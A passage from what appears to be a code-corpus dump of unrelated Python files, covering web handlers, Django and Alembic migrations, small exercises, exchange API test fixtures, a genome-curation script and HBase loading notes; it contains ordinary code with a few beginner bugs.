trip_dict = {'trips' : trips}
path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
self.response.out.write(template.render(path, trip_dict))
class KayakHandler(webapp.RequestHandler):
def get(self):
file = open('kayak-result.xml','r')
content = file.read()
content = replace(content, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
trip_dict = {'trips' : trips}
'''
xml = ET.fromstring(content)
trips = xml.findall("trips/trip")
trip_dict = {'trips' : trips}
'''
path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
self.response.out.write(template.render(path, trip_dict))
class ClearTripHandler(webapp.RequestHandler):
def get(self):
file = open('result.xml','r')
content = file.read()
content = replace(content, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
trip_dict = {'trips' : trips}
'''
xml = ET.fromstring(content)
trips = xml.findall("trips/trip")
trip_dict = {'trips' : trips}
'''
path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')
self.response.out.write(template.render(path, trip_dict))
class MessageParser(webapp.RequestHandler):
def get(self):
messaging = Messaging()
messaging.collect_messages()
messaging.process_messages()
self.response.out.write(messaging.mentions)
def main():
logging.getLogger().setLevel(logging.DEBUG)
application = webapp.WSGIApplication([
('/', MainHandler),
('/kayak', KayakHandler),
('/cleartrip', ClearTripHandler),
('/cron', CronHandler),
('/api/kayak', KayakApi),
('/messaging', MessageParser),
], debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
|
9,547 | 87e0b9dc518d439f71e261d5c5047153324919ba | # Generated by Django 2.0.2 on 2018-06-10 18:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Expression',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.FloatField()),
],
),
migrations.CreateModel(
name='Gene',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gene_id', models.CharField(max_length=20, unique=True)),
('summary', models.CharField(max_length=10000)),
],
),
migrations.CreateModel(
name='MutualInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.FloatField()),
('dataset', models.CharField(max_length=1000)),
('gene1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gene1', to='plots.Gene')),
('gene2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gene2', to='plots.Gene')),
],
),
migrations.CreateModel(
name='Pca',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pc1', models.FloatField()),
('pc2', models.FloatField()),
],
),
migrations.CreateModel(
name='Sample',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('cell_type', models.CharField(max_length=100)),
('dataset', models.CharField(max_length=1000)),
],
),
migrations.AddField(
model_name='pca',
name='sample',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Sample'),
),
migrations.AddField(
model_name='expression',
name='gene',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Gene'),
),
migrations.AddField(
model_name='expression',
name='sample',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='plots.Sample'),
),
]
|
9,548 | 4dcc0261abdb783c60471736567faf7db8b56190 | from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name',
type = str,
required = True,
help = 'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self,name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message':"Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return(list[map(lambda x: x.json() for x in StoreMode.query.all())]) |
9,549 | 6bd9c8e38373e696193c146b88ebf6601170cf0e | from django.urls import reverse_lazy
from django.views.generic import CreateView, edit, ListView
from django.shortcuts import render
from django.contrib.auth import authenticate, login
from users.forms import CustomUserCreationForm, LoginForm
from users.models import CustomUser as Users
class SignUpView(CreateView):
form_class = CustomUserCreationForm
success_url = reverse_lazy('login')
template_name = 'users/signup.html'
class IndexView(edit.FormView):
success_url = '/facilities'
form_class = LoginForm
template_name = 'users/index.html'
def form_valid(self, form):
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(self.request, username=username, password=password)
if user is not None:
login(self.request, user)
return super().form_valid(form)
|
9,550 | a3f6ea649fc5e60b0f8353b1404912d060686b99 | # 10.13.20 - sjg
# Exercise 15 - solution A
# Write a function called greatestCommomFactor that,
#given two distinct positive integers,
#returns the greatest common factor of those two values
#Input: greatestCommonFactor(9,12)
#Output: 3
#Input: greatestCommonFactor(6,18)
#Output: 6
#Input: greatestCommonFactor(11,4)
#Output: 1
def greatestCommonFactor(posInt1, posInt2):
#range of posInt1, plus posInt1
range_posInt1 = list(range(1,posInt1+1))
# list of factors
factors_posInt1 = []
#iterating i through range_posInt1, starting i == 1, if int % i is zero,
#then divisible, meaning it's a factor, so add i in those cases to list of factors
#dont use a break statement bc each integer needs to be checked within the range list
for i in range_posInt1:
if posInt1 % i == 0:
factors_posInt1.append(i)
#range of posInt2, plus posInt2
range_posInt2 = list(range(1,posInt2+1))
#factors_posInt2 - list of factors, create empty list
factors_posInt2 = []
for i in range_posInt2:
if posInt2 % i == 0:
factors_posInt2.append(i)
#define int variable, result, which will house the greatest common factor between the 2 parameters,
# and default value being 1 bc for posInts, the smallest factor of a pos # would be 1
result = 1
#iterating through the factors of posInt1,
for factor_posInt1 in factors_posInt1:
#if particular value is present in factors_posInt2
if factor_posInt1 in factors_posInt2:
#set result equal to that factor
result = factor_posInt1
#no break statement bc need to go through entire for loop to get answer
print("The greatest common factor of", posInt1, "and", posInt2, "is:")
return result
print(greatestCommonFactor(9,12))
print(greatestCommonFactor(6,18))
print(greatestCommonFactor(11,4)) |
9,551 | 00e8e0b5aeccd2a67f6cfdad63012a0d8b066e6f | from django.shortcuts import render
from django.template import loader
# Create your views here.
from django.http import HttpResponse
from .models import Student
def index(request):
student_objects = Student.objects.all()
context = {"students": student_objects}
return render(request, 'student_list.html', context)
def addstudent(request):
context = {}
return render(request, 'add_student.html', context)
def newstudent(request):
student_entered_name = request.GET.get('name')
Student.objects.create(name=student_entered_name)
print(student_entered_name)
context = {}
return render(request, 'student_list.html', context)
|
9,552 | 0bf970a84911d29a8343575ef15f2765875b8b89 | from graphics import *
from random import random
def printIntro():
print("This program evaluates pi via Monte Carlo techniques")
def simDarts(n):
win = GraphWin("", 400, 400)
win.setCoords(-1.2, -1.2, 1.2, 1.2)
hits = 0
for i in range(n):
pt = getDarts()
if hitTarget(pt):
hits = hits + 1
else:
hits = hits
return hits
def getDarts():
x = 2 * random() -1
y = 2 * random() -1
pt = Point(x, y)
return pt
def hitTarget(pt):
x = pt.getX()
y = pt.getY()
if (x**2+y**2) <= 1:
return True
else:
return False
def getPi(hits, n):
pi = 4 * (hits/n)
return pi
def main():
printIntro()
n = eval(input("Please enter the number of simulation (n > 500): "))
h = simDarts(n)
pi = getPi(h, n)
print("Pi = ", pi)
main()
|
9,553 | 42f021c728a88f34d09f94ea96d91abded8a29fb | # Generated by Django 3.2.6 on 2021-08-19 16:17
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('crm', '0040_auto_20210819_1913'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='full_name',
),
migrations.RemoveField(
model_name='managercrm',
name='full_name',
),
]
|
9,554 | 5718eab8c5fac4cb7bfa1b049b63ca1e30610247 | L = [
[
"0",
"0",
"00"
],[
"..0",
"000"
],[
"00",
".0",
".0"
], [
"000",
"0"
]
]
J = [
[
".0",
".0",
"00"
],[
"0..",
"000"
],[
"00",
"0",
"0"
], [
"000",
"..0"
]
]
O = [
[
"00",
"00"
]
]
T = [
[
"000",
".0"
], [
"0",
"00",
"0"
], [
".0",
"000"
], [
".0",
"00",
".0"
]
]
I = [
[
"0000"
], [
"0",
"0",
"0",
"0"
]
]
S = [
[
".00",
"00"
], [
"0.",
"00",
".0"
]
]
Z = [
[
"00",
".00"
], [
".0",
"00",
"0"
]
]
shapes = [L, J, O, T, I, S, Z]
shapes_colors = [
(255, 230, 0),
(38, 255, 0),
(0, 213, 255),
(255, 0, 255),
(255, 0, 0),
(255, 170, 0),
(157, 0, 255)
]
|
9,555 | eba8e2bda786760898c10d3e75620144973d6236 | class FixtureBittrex:
PING = {"serverTime": 1582535502000}
MARKETS = [
{
"symbol": "ETH-BTC", "baseCurrencySymbol": "ETH", "quoteCurrencySymbol": "BTC",
"minTradeSize": "0.01314872", "precision": 8,
"status": "ONLINE", "createdAt": "2015-08-14T09:02:24.817Z"},
{
"symbol": "BTC-USDT", "baseCurrencySymbol": "BTC", "quoteCurrencySymbol": "USDT",
"minTradeSize": "0.00025334", "precision": 8,
"status": "ONLINE", "createdAt": "2015-12-11T06:31:40.633Z", "notice": ""},
{
"symbol": "BTC-USD", "baseCurrencySymbol": "BTC", "quoteCurrencySymbol": "USD",
"minTradeSize": "0.00025427", "precision": 3,
"status": "ONLINE", "createdAt": "2018-05-31T13:24:40.77Z"},
{
"symbol": "ETH-USDT", "baseCurrencySymbol": "ETH", "quoteCurrencySymbol": "USDT",
"minTradeSize": "0.01334966", "precision": 8,
"status": "ONLINE", "createdAt": "2017-04-20T17:26:37.647Z", "notice": ""}
]
MARKETS_TICKERS = [
{
"symbol": "ETH-BTC", "lastTradeRate": "0.02739396",
"bidRate": "0.02740726", "askRate": "0.02741416"},
{
"symbol": "ETH-USDT", "lastTradeRate": "267.26100000",
"bidRate": "266.96646649", "askRate": "267.22586512"},
{
"symbol": "BTC-USDT", "lastTradeRate": "9758.81200003",
"bidRate": "9760.51000000", "askRate": "9765.82533436"},
{
"symbol": "BTC-USD", "lastTradeRate": "9770.73200000",
"bidRate": "9767.64400000", "askRate": "9770.73200000"}
]
# General User Info
BALANCES = [{"currencySymbol": "BTC", "total": "0.00279886", "available": "0.00279886"},
{"currencySymbol": "BTXCRD", "total": "1031.33915356", "available": "1031.33915356"},
{"currencySymbol": "ETH", "total": "0.24010276", "available": "0.24010276"},
{"currencySymbol": "USDT", "total": "76.30113330", "available": "67.48856276"},
{"currencySymbol": "XZC", "total": "4.99205590", "available": "4.99205590"},
{"currencySymbol": "ZRX", "total": "0.00000000", "available": "0.00000000"}]
# User Trade Info
FILLED_BUY_LIMIT_ORDER = {
"id": "d7850281-0440-4478-879f-248499b2134d", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "268.09208274",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.06000000", "commission": "0.01333791",
"proceeds": "5.33516582", "status": "CLOSED", "createdAt": "2020-02-24T09:38:13.1Z",
"updatedAt": "2020-02-24T09:38:13.1Z", "closedAt": "2020-02-24T09:38:13.1Z"}
OPEN_BUY_LIMIT_ORDER = {
"id": "615aa7de-3ff9-486d-98d7-2d37aca212c9", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "205.64319999",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.00000000", "commission": "0.00000000",
"proceeds": "0.00000000", "status": "OPEN", "createdAt": "2020-02-25T11:13:32.12Z",
"updatedAt": "2020-02-25T11:13:32.12Z"}
CANCEL_ORDER = {
"id": "615aa7de-3ff9-486d-98d7-2d37aca212c9", "marketSymbol": "ETH-USDT", "direction": "BUY",
"type": "LIMIT", "quantity": "0.06000000", "limit": "205.64319999",
"timeInForce": "GOOD_TIL_CANCELLED", "fillQuantity": "0.00000000", "commission": "0.00000000",
"proceeds": "0.00000000", "status": "CLOSED", "createdAt": "2020-02-25T11:13:32.12Z",
"updatedAt": "2020-02-25T11:13:33.63Z", "closedAt": "2020-02-25T11:13:33.63Z"}
ORDERS_OPEN = [
{
"id": "9854dc2a-0762-408d-922f-882f4359c517", "marketSymbol": "ETH-USDT", "direction": "BUY", "type": "LIMIT",
"quantity": "0.03000000", "limit": "134.75247524", "timeInForce": "GOOD_TIL_CANCELLED",
"fillQuantity": "0.00000000", "commission": "0.00000000", "proceeds": "0.00000000", "status": "OPEN",
"createdAt": "2020-01-10T10:25:25.13Z", "updatedAt": "2020-01-10T10:25:25.13Z"},
{
"id": "261d9158-c9c1-40a6-bad8-4b447a471d8f", "marketSymbol": "ETH-USDT", "direction": "BUY", "type": "LIMIT",
"quantity": "0.03000000", "limit": "158.26732673", "timeInForce": "GOOD_TIL_CANCELLED",
"fillQuantity": "0.00000000", "commission": "0.00000000", "proceeds": "0.00000000", "status": "OPEN",
"createdAt": "2020-01-26T02:58:14.19Z", "updatedAt": "2020-01-26T02:58:14.19Z"}
]
WS_AFTER_BUY_2 = {
'event_type': 'uO', 'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 8, 'TY': 2,
'o': {
'U': '00000000-0000-0000-0000-000000000000',
'I': 4551095126,
'OU': 'd67c837e-56c5-41e2-b65b-fe590eb06eaf',
'E': 'ETH-USDT', 'OT': 'LIMIT_BUY', 'Q': 0.06, 'q': 0.0,
'X': 269.05759499, 'n': 0.01338594, 'P': 5.35437999,
'PU': 267.7189995, 'Y': 1582540341630,
'C': 1582540341630, 'i': False, 'CI': False, 'K': False,
'k': False, 'J': None, 'j': None, 'u': 1582540341630,
'PassthroughUuid': None}},
'error': None,
'time': '2020-02-24T10:32:21'
}
WS_AFTER_BUY_1 = {
'event_type': 'uO', 'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 13, 'TY': 0,
'o': {
'U': '00000000-0000-0000-0000-000000000000', 'I': 4564385840,
'OU': '615aa7de-3ff9-486d-98d7-2d37aca212c9', 'E': 'ETH-USDT',
'OT': 'LIMIT_BUY', 'Q': 0.06, 'q': 0.06, 'X': 205.64319999, 'n': 0.0,
'P': 0.0, 'PU': 0.0, 'Y': 1582629212120, 'C': None, 'i': True,
'CI': False, 'K': False, 'k': False, 'J': None, 'j': None,
'u': 1582629212120, 'PassthroughUuid': None}},
'error': None,
'time': '2020-02-25T11:13:32'
}
WS_AFTER_SELL_2 = {
'event_type': 'uO',
'content': {
'w': 'f8907116-4e24-4602-b691-d110b5ce1bf8', 'N': 10, 'TY': 2,
'o': {
'U': '00000000-0000-0000-0000-000000000000', 'I': 4279414326,
'OU': '447256cc-9335-41f3-bec9-7392804d30cd', 'E': 'ETH-USDT',
'OT': 'LIMIT_SELL', 'Q': 0.06, 'q': 0.0, 'X': 257.72689, 'n': 0.0129511,
'P': 5.18044, 'PU': 259.022, 'Y': 1582627522640, 'C': 1582627522640,
'i': False, 'CI': False, 'K': False, 'k': False, 'J': None, 'j': None,
'u': 1582627522640, 'PassthroughUuid': None}},
'error': None,
'time': '2020-02-25T10:45:22'}
WS_ORDER_BOOK_SNAPSHOT = {
'nonce': 115097,
'type': 'snapshot',
'results': {
'M': 'ETH-USDT', 'N': 115097,
'Z': [
{'Q': 3.7876, 'R': 261.805},
{'Q': 3.99999998, 'R': 261.80200001},
{'Q': 20.92267278, 'R': 261.75575521}],
'S': [
{'Q': 3.618, 'R': 262.06976758},
{'Q': 1.2, 'R': 262.06976759},
{'Q': 4.0241, 'R': 262.07}],
'f': [
{'I': 53304378, 'T': 1582604545290, 'Q': 1.75736397, 'P': 261.83, 't': 460.1306082651,
'F': 'FILL', 'OT': 'SELL', 'U': 'a0de16e3-6f6d-43f0-b9ea-a8c1f9835223'},
{'I': 53304377, 'T': 1582604544910, 'Q': 0.42976603, 'P': 261.83, 't': 112.5256396349,
'F': 'FILL', 'OT': 'SELL', 'U': 'dc723d5e-2af5-4010-9eb2-a915f050015e'}]}
}
|
9,556 | 67b483d9d002cc66dd368cf53fdc49ebb7b4f4d4 | # type: ignore[no-redef]
import pytest
@pytest.mark.asyncio
@pytest.mark.core
async def test_async_executor(executor):
def func():
pass
result = await executor.run(func)
assert result is None
def func():
return 1
result = await executor.run(func)
assert result == 1
def func(x: int, /, y: float):
return x / y
result = await executor.run(func, 0, 1)
assert result == 0
result = await executor.run(func, 0, y=1)
assert result == 0
def func(x: int, y: float, **kwargs):
return x + y + kwargs.get("test")
result = await executor.run(func, 0, y=1, test=2)
assert result == 3
|
9,557 | 62094d036596f39e7cf936fe7a91e67d53ee055e | from flask import (
Flask,
render_template,
request
)
import requests
app = Flask(__name__)
base_url = "https://api.github.com/users/"
@app.route("/", methods = ["GET", "POST"])
def index():
if request.method == "POST":
githubName = request.form.get("githubname")
responseUser = requests.get("{}{}".format(base_url, githubName))
responseRepos = requests.get("{}{}/repos".format(base_url, githubName))
userInfo = responseUser.json()
userRepos = responseRepos.json()
if "message" in userInfo:
return render_template("index.html", error = "Kullanıcı Bulunamadı")
return render_template("index.html", profile = userInfo , repos = userRepos)
return render_template("index.html")
if __name__ == "__main__":
app.run(debug = True) |
9,558 | ce65a672cae26bdb8ec8cb04eabfe1877f9cd7d4 | #!/usr/bin/env python
# coding: utf-8
from sklearn.metrics import confusion_matrix
import numpy as np
import pandas as pd
df = pd.read_csv('orb.csv')
d = pd.pivot_table(df,index='col1',columns='col2',values='result')
d.fillna(0,inplace=True)
|
9,559 | 8fa58791aae1352109b3bf7410d68bf5ae1d8cb7 | # coding: utf-8
"""
Styled object
=============
A :class:`~benker.styled.Styled` object contains a dictionary of styles.
It is mainly used for :class:`~benker.table.Table`, :class:`~benker.table.RowView`,
:class:`~benker.table.ColView`, and :class:`~benker.cell.Cell`.
"""
import pprint
class Styled(object):
"""
Styled object, like Table, Row, Column, or Cell objects.
A styled object stores user-defined styles: a dictionary of key-value pairs.
This values are useful to store some HTML-like styles (border-style,
border-width, border-color, vertical-align, text-align, etc.).
Of course, we are not tied to the HTML-like styles, you can use your
own list of styles.
.. note::
The style dictionary is always copied: in other words, key-value pairs
are copied but a shallow copy is done for the values (in general, it
is not a problem if you use non-mutable values like :class:`str`).
A styled object stores a nature: a way to distinguish the body cells,
from the header and the footer. The default value is ``None``, but you can
use "body", "header", "footer" or whatever is suitable for your needs.
This kind of information is in general not stored in the styles,
even if it is similar.
Tables can also have a *nature*, similar to HTML ``@class`` attribute,
you can use it do identify the styles to apply to your table.
.. note::
In a :class:`~benker.grid.Grid`, the :ref:`merging <benker__grid__merging>`
of two natures is done by keeping the first nature and
dropping the second one. In other words, the resulting nature is
the group of the most top-left nature of the merged cells.
"""
__slots__ = ('_styles', 'nature')
def __init__(self, styles, nature):
"""
Construct a styled object from a dictionary of styles.
:type styles: typing.Dict[str, str]
:param styles:
Dictionary of key-value pairs, where *keys* are the style names.
:type nature: str
:ivar nature:
Cell *nature* used to distinguish the body cells, from the header and the footer.
Table *nature* used to store a value similar to HTML ``@class`` attribute.
"""
#: Dictionary of key-value pairs, where *keys* are the style names.
self.styles = styles
#: Cell *nature* used to distinguish the body cells, from the header and the footer.
self.nature = nature
def __str__(self):
return str(self._styles)
def __repr__(self):
cls = self.__class__.__name__
items = pprint.pformat(self._styles)
nature = self.nature
return "<{cls}({items}, {nature!r})>".format(cls=cls, items=items, nature=nature)
@property
def styles(self):
""" Dictionary of styles: key-value pairs. """
return self._styles
@styles.setter
def styles(self, styles):
""" Setup the dictionary of styles (shallow copy of the items). """
# each cell owns it's own copy of the styles
self._styles = {} if styles is None else styles.copy()
|
9,560 | 53909b750f259b67b061ba26d604e0c2556376df | ###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__author__ = 'Donovan Parks'
__copyright__ = 'Copyright 2020'
__credits__ = ['Donovan Parks']
__license__ = 'GPL3'
__version__ = '0.0.1'
__maintainer__ = 'Donovan Parks'
__email__ = 'donovan.parks@gmail.com'
__status__ = 'Development'
import sys
import argparse
import re
import datetime
import os
import logging
import time
import math
from collections import defaultdict, namedtuple
from biolib.common import canonical_gid
class CurationLists(object):
"""Lists and pseudo-trees for new representatives, polyphyletic taxa, rogue genomes, and genomes with modified NCBI names."""
def __init__(self, domain, output_dir):
"""Initialization."""
self.domain = domain
self.output_dir = output_dir
self.logger = logging.getLogger('timestamp')
def pseudo_tree(self, gids, out_tree):
"""Create pseudo-tree with the specified genome IDs."""
pseudo_tree = '('
pseudo_tree += ','.join(gids)
pseudo_tree += ');'
fout = open(out_tree, 'w')
fout.write(pseudo_tree)
fout.close()
def new_gtdb_reps(self,
domain_gids,
gtdb_sp_clusters,
gtdb_prev_sp_clusters):
"""New GTDB representatives."""
self.logger.info('Identifying previous GTDB representatives.')
prev_rids = set()
with open(gtdb_prev_sp_clusters) as f:
f.readline()
for line in f:
tokens = line.strip().split('\t')
rid = canonical_gid(tokens[0])
prev_rids.add(rid)
self.logger.info(' - identified {:,} previous GTDB representatives.'.format(
len(prev_rids)))
self.logger.info('Identifying current GTDB representatives.')
cur_rids = set()
with open(gtdb_sp_clusters) as f:
f.readline()
for line in f:
tokens = line.strip().split('\t')
rid = canonical_gid(tokens[0])
cur_rids.add(rid)
self.logger.info(' - identified {:,} current GTDB representatives.'.format(
len(cur_rids)))
self.logger.info('Creating curation list and pseudo-tree of new GTDB representatives.')
out_file = os.path.join(self.output_dir, f'gids_new_reps.{self.domain}.lst')
fout = open(out_file, 'w')
new_rids = set()
for rid in cur_rids:
if rid in domain_gids and rid not in prev_rids:
fout.write('{}\n'.format(rid))
new_rids.add(rid)
fout.close()
self.logger.info(' - identified {:,} new GTDB representatives.'.format(
len(new_rids)))
self.pseudo_tree(new_rids, out_file.replace('.lst', '.tree'))
def poly_rogue_gtdb_reps(self,
domain_gids,
taxa_gid_map,
gtdb_decorate_table):
"""Polyphyletic and rogue GTDB representatives."""
self.logger.info('Identifying polyphyletic and rogue GTDB representatives.')
poly_taxa_count = 0
poly_gids = set()
rogue_gids = set()
with open(gtdb_decorate_table) as f:
f.readline()
for line in f:
tokens = line.split('\t')
taxon = tokens[0]
fmeasure = float(tokens[2])
rogue_in = tokens[7].strip()
rogue_out = tokens[8].strip()
if fmeasure < 1.0:
poly_taxa_count += 1
poly_gids.update(taxa_gid_map[taxon])
if rogue_in:
for gid in rogue_in.split(','):
gid = canonical_gid(gid.strip())
if not gid.startswith('D-'):
rogue_gids.add(gid)
if rogue_out:
for gid in rogue_out.split(','):
gid = canonical_gid(gid.strip())
if not gid.startswith('D-'):
rogue_gids.add(gid)
self.logger.info(' - identified {:,} polyphyletic taxa spanning {:,} GTDB representatives.'.format(
poly_taxa_count,
len(poly_gids)))
self.logger.info(' - identified {:,} rogue GTDB representatives.'.format(
len(rogue_gids)))
self.logger.info('Creating curation lists and pseudo-trees of polyphyletic GTDB representatives.')
out_file = os.path.join(self.output_dir, f'gids_poly_taxa.{self.domain}.lst')
fout = open(out_file, 'w')
for gid in poly_gids:
fout.write('{}\n'.format(gid))
fout.close()
self.pseudo_tree(poly_gids, out_file.replace('.lst', '.tree'))
self.logger.info('Creating curation lists and pseudo-trees of rogue GTDB representatives.')
out_file = os.path.join(self.output_dir, f'gids_rogues.{self.domain}.lst')
fout = open(out_file, 'w')
for gid in rogue_gids:
fout.write('{}\n'.format(gid))
fout.close()
self.pseudo_tree(rogue_gids, out_file.replace('.lst', '.tree'))
def run(self,
gtdb_init_taxonomy,
gtdb_sp_clusters,
gtdb_prev_sp_clusters,
gtdb_decorate_table):
"""Create curation lists and pseudo-trees."""
# get genomes
self.logger.info('Identifying taxonomic assignment of genomes.')
taxa_gid_map = defaultdict(set)
domain_gids = set()
for line in open(gtdb_init_taxonomy):
tokens = line.strip().split('\t')
gid = canonical_gid(tokens[0])
taxa = [t.strip() for t in tokens[1].split(';')]
for taxon in taxa:
taxa_gid_map[taxon].add(gid)
domain_gids.add(gid)
self.logger.info(' - identified {:,} genomes.'.format(
len(domain_gids)))
# new GTDB representatives
self.new_gtdb_reps(domain_gids,
gtdb_sp_clusters,
gtdb_prev_sp_clusters)
# polyphyletic and rogue GTDB representatives
self.poly_rogue_gtdb_reps(domain_gids,
taxa_gid_map,
gtdb_decorate_table) |
9,561 | fd2b60de2ef540264855f04e1c5bcb9d1cf23c51 | """Changed Views table name
Revision ID: 7f559bb24ca4
Revises: cc927fe47c8f
Create Date: 2021-08-20 23:20:31.959984
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7f559bb24ca4"
down_revision = "cc927fe47c8f"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"views",
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("url_id", sa.String(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("view")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"view",
sa.Column("id", sa.INTEGER(), nullable=False),
sa.Column("url_id", sa.VARCHAR(length=31), nullable=True),
sa.ForeignKeyConstraint(
["url_id"],
["urls.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.drop_table("views")
# ### end Alembic commands ###
|
9,562 | cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb | from Tkinter import *
import time
def create_window():
window = Toplevel(root)
w, h = root.winfo_screenwidth(), root.winfo_screenheight()
canvas = Canvas(window,width=w,height=h)
canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial")
canvas.pack()
window.overrideredirect(1)
window.geometry("%dx%d+0+0" % (w, h))
window.after(3000, lambda: window.destroy())
root = Tk()
root.title("3 Second Splash")
root.geometry("250x250")
b = Button(root, text="Launch splash window", command=create_window)
b.place(relx=0.5,rely=0.5,anchor=CENTER)
#b.pack()
root.mainloop()
|
9,563 | 91188b55b0f5d8277812d82711f5bcde82819b30 | import datetime, time, threading, os
from . import queues
logLevels = ["none", "info", "debug"]
level = "none"
def write(message):
queues.logger_queue.put(message)
def runLogger():
while True:
# The log path should be read from config. Pass into logger?
log_path = "/home/pi/Desktop/Projects/rose/robot_code/logs/"
try:
os.makedirs(log_path)
except FileExistsError:
pass
file_name = log_path + "Logs-" + str(datetime.date.today())
if not queues.logger_queue.empty():
message = queues.logger_queue.get()
if message == "turn off":
break
else:
writeFile(file_name, message)
else:
continue
def writeFile(file_name = None, message = None, lvl = "none"):
global logLevels
global level
index = logLevels.index(level)
if lvl in logLevels:
lvlIndex = logLevels.index(lvl)
else:
lvlIndex = 0
if index >= lvlIndex:
if not file_name is None and not message is None:
with open(file_name + ".txt", "a") as fileObj:
fileObj.write(message)
fileObj.write("\n")
def writeEnd():
queues.logger_queue.put("turn off")
|
9,564 | 0e0e51904f05b41b4769b730c836568b8bb63869 | #Sorting for a number list
#ascending and descending
ls=[1,34,23,56,34,67,87,54,62,31,66]
ls.sort(reverse=True)
print(ls)
ls.sort()
print(ls)
#Sorting a letter's list with different scenarios
ls_l=["aaa","ertdf","ieurtff","fnjr","resdjx","jfh","r","fd"]
#1-sort according to string length from small length to bigger
ls_l.sort(key=len)
print(ls_l)
#you can always reverse
ls_l.sort(key=len,reverse=True)
print(ls_l)
#2-Sort with first alphabetical order
def FirstLetter(string):
return string[0]
ls_l.sort(key=FirstLetter)
print(ls_l)
ls2=[[0,1,'f'],[4,2,'t'],[9,4,'afsd']]
def secondItem(ls):
return ls[2]
ls2.sort(key=secondItem)
print(ls2)
|
9,565 | 7b38c64174656d1c4ec2b0541e6ed8d6680af7d7 | '''
we have source files with a certain format and each file has 200 columns and there is a process that takes the source
files and loads into hbase and moves it into sql data warehouse. We have to create automated test scripts that compares
with with is with hbase and sql data warehouse. load into hbase and query the flat file, query the hbase, and compare.
compare each row. load into hbase and query.
https://community.hortonworks.com/articles/4942/import-csv-data-into-hbase-using-importtsv.html
https://www.briandunning.com/sample-data/
http://python-phoenixdb.readthedocs.io/en/latest/
https://phoenix.apache.org/faq.html
https://phoenix.apache.org/bulk_dataload.html
hbase shell
create 'CUSTOMERS', 'cf'
count 'CUSTOMERS'
scan 'CUSTOMERS'
exit
hdfs dfs -put customers-with-out-header-500.csv
hbase org.apache.hadoop.hbase.mapreduce.ImportTsv '-Dimporttsv.separator=|' -Dimporttsv.columns="HBASE_ROW_KEY,cf:first_name,cf:last_name,cf:company_name,cf:address,cf:city,cf:county,cf:state,cf:zip,cf:phone1,cf:phone2,cf:email,cf:web" CUSTOMERS customers-with-out-header-500.csv
sudo python3 -m pip install happybase
sudo python3 -m pip install pandas
sudo python3 -m pip install numpy
sudo python3 -m pip install ipython
list of hbase tables [b'customers']
len of hbase keys 501
hbase columns [b'cf:state', b'cf:phone2', b'cf:email', b'cf:zip', b'cf:last_name', b'cf:address', b'cf:city', b'cf:company_name', b'cf:phone1', b'cf:county', b'cf:first_name', b'cf:web']
hbase columns len 12
csv file shape (500, 13)
csv columns ['index', 'first_name', 'last_name', 'company_name', 'address', 'city', 'county', 'state', 'zip', 'phone1', 'phone2', 'email', 'web']
phoenix steps
